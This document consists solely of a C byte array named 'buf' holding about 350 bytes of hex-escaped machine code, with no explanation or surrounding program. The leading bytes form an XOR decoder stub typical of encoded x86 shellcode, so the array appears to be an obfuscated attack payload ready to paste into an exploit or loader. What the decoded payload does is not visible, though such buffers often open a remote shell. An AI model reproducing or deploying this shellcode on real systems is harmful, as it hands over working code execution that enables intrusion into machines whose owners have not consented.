unsigned char buf[] = 
"\xda\xd6\xba\xb9\xe8\xed\xdc\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
"\x52\x83\xeb\xfc\x31\x53\x13\x03\xea\xfb\x0f\x29\xf0\x14\x4d"
"\xd2\x08\xe5\x32\x5a\xed\xd4\x72\x38\x66\x46\x43\x4a\x2a\x6b"
"\x28\x1e\xde\xf8\x5c\xb7\xd1\x49\xea\xe1\xdc\x4a\x47\xd1\x7f"
"\xc9\x9a\x06\x5f\xf0\x54\x5b\x9e\x35\x88\x96\xf2\xee\xc6\x05"
"\xe2\x9b\x93\x95\x89\xd0\x32\x9e\x6e\xa0\x35\x8f\x21\xba\x6f"
"\x0f\xc0\x6f\x04\x06\xda\x6c\x21\xd0\x51\x46\xdd\xe3\xb3\x96"
"\x1e\x4f\xfa\x16\xed\x91\x3b\x90\x0e\xe4\x35\xe2\xb3\xff\x82"
"\x98\x6f\x75\x10\x3a\xfb\x2d\xfc\xba\x28\xab\x77\xb0\x85\xbf"
"\xdf\xd5\x18\x13\x54\xe1\x91\x92\xba\x63\xe1\xb0\x1e\x2f\xb1"
"\xd9\x07\x95\x14\xe5\x57\x76\xc8\x43\x1c\x9b\x1d\xfe\x7f\xf4"
"\xd2\x33\x7f\x04\x7d\x43\x0c\x36\x22\xff\x9a\x7a\xab\xd9\x5d"
"\x7c\x86\x9e\xf1\x83\x29\xdf\xd8\x47\x7d\x8f\x72\x61\xfe\x44"
"\x82\x8e\x2b\xca\xd2\x20\x84\xab\x82\x80\x74\x44\xc8\x0e\xaa"
"\x74\xf3\xc4\xc3\x1f\x0e\x8f\x2b\x77\x28\x26\xc4\x8a\x48\xbc"
"\xc6\x02\xae\xd6\xf6\x42\x79\x4f\x6e\xcf\xf1\xee\x6f\xc5\x7c"
"\x30\xfb\xea\x81\xff\x0c\x86\x91\x68\xfd\xdd\xcb\x3f\x02\xc8"
"\x63\xa3\x91\x97\x73\xaa\x89\x0f\x24\xfb\x7c\x46\xa0\x11\x26"
"\xf0\xd6\xeb\xbe\x3b\x52\x30\x03\xc5\x5b\xb5\x3f\xe1\x4b\x03"
"\xbf\xad\x3f\xdb\x96\x7b\xe9\x9d\x40\xca\x43\x74\x3e\x84\x03"
"\x01\x0c\x17\x55\x0e\x59\xe1\xb9\xbf\x34\xb4\xc6\x70\xd1\x30"
"\xbf\x6c\x41\xbe\x6a\x35\x71\xf5\x36\x1c\x1a\x50\xa3\x1c\x47"
"\x63\x1e\x62\x7e\xe0\xaa\x1b\x85\xf8\xdf\x1e\xc1\xbe\x0c\x53"
"\x5a\x2b\x32\xc0\x5b\x7e";
